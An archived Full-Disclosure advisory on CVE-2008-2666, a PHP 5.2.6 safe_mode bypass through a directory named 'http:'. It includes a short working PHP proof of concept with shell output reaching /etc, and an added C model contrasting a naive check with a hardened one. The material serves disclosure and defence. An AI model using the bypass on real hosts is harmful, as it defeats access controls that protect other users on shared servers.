SECURITYVULNS:DOC:20073

[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass

2008-06-23 00:00:00
vulners.com


[PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

chdir - Change directory

SYNOPSIS:

bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php

ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---

Let's look at the chdir() function:

PHP_FUNCTION(chdir)
{
    char *str;
    int ret, str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
        RETURN_FALSE;
    }

    if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) ||
        php_check_open_basedir(str TSRMLS_CC)) {
        RETURN_FALSE;
    }
    ret = VCWD_CHDIR(str);

    if (ret != 0) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
        RETURN_FALSE;
    }

    RETURN_TRUE;
}


str is checked by safe_mode. Example:


Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to
access / owned by uid 0 in /www/mb/mb.php on line 8


If we create a subdirectory named "http:" in the current directory, it becomes possible to call

chdir("http://../../../../../../")

and we end up in /.

Why?

The guard

    (PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) ||
    php_check_open_basedir(str TSRMLS_CC)

does not reject

    str = "http://../../../../../../"

because safe_mode ignores all paths with an http:// prefix: the check treats the string as a URL and skips it, while VCWD_CHDIR() treats the very same string as an ordinary relative path (the "http:" subdirectory, then the ".." components).

The same situation applies to the ftok() function (and more).

---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to
access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---
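To show why the string passes the guard and what a check that resolves the path first does instead, here is an added C model written for this page (it is not PHP's own php_checkuid()/php_check_open_basedir() code): the names looks_like_url, naive_guard, hardened_guard and run_scenario are hypothetical, and the scenario builds its own "http:" subdirectory under /tmp, mirroring EXAMPLE2.

```c
#define _GNU_SOURCE            /* glibc: declares realpath() and mkdtemp() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <sys/stat.h>

/* Pre-fix model: anything containing "scheme://" is taken for a stream-wrapper
 * target and skips the uid check, although VCWD_CHDIR() treats it as a path. */
static int looks_like_url(const char *path) {
    const char *p = strstr(path, "://");
    return p != NULL && p != path;
}

/* Naive guard, as the advisory describes it: 1 = allowed, 0 = rejected. */
static int naive_guard(const char *path, uid_t script_uid) {
    struct stat st;
    if (looks_like_url(path)) return 1;        /* safe_mode check skipped */
    if (stat(path, &st) != 0) return 0;
    return st.st_uid == script_uid;
}

/* Hardened guard: resolve the string the way chdir() will interpret it (a path
 * relative to the cwd), then compare the owner of the real target. */
static int hardened_guard(const char *path, uid_t script_uid, char *resolved, size_t n) {
    struct stat st;
    char buf[PATH_MAX];
    if (realpath(path, buf) == NULL) return 0;  /* target does not exist */
    if (resolved) snprintf(resolved, n, "%s", buf);
    if (stat(buf, &st) != 0) return 0;
    return st.st_uid == script_uid;
}

/* Constructed scenario mirroring EXAMPLE2: a fresh work dir with an "http:"
 * subdirectory becomes the cwd. Bitmask: 1 = naive guard lets the string through,
 * 2 = hardened guard resolves it to the parent dir, 4 = it rejects a foreign uid. */
static int run_scenario(void) {
    char work[] = "/tmp/cve-2008-2666-XXXXXX", sub[PATH_MAX], got[PATH_MAX], parent[PATH_MAX];
    struct stat st;
    int result = 0;
    if (mkdtemp(work) == NULL) return -1;
    snprintf(sub, sizeof sub, "%s/http:", work);
    if (mkdir(sub, 0755) != 0 || chdir(work) != 0) return -1;
    if (realpath("..", parent) == NULL || stat(parent, &st) != 0) return -1;
    if (naive_guard("http://../../", (uid_t)12345)) result |= 1;
    if (hardened_guard("http://../../", st.st_uid, got, sizeof got) && strcmp(got, parent) == 0) result |= 2;
    if (!hardened_guard("http://../../", st.st_uid + 1, NULL, 0)) result |= 4;
    return result;
}
```

run_scenario() returns 7 when the naive guard waves "http://../../" through while the hardened guard resolves it to the parent of the work directory and applies the owner check there.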

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/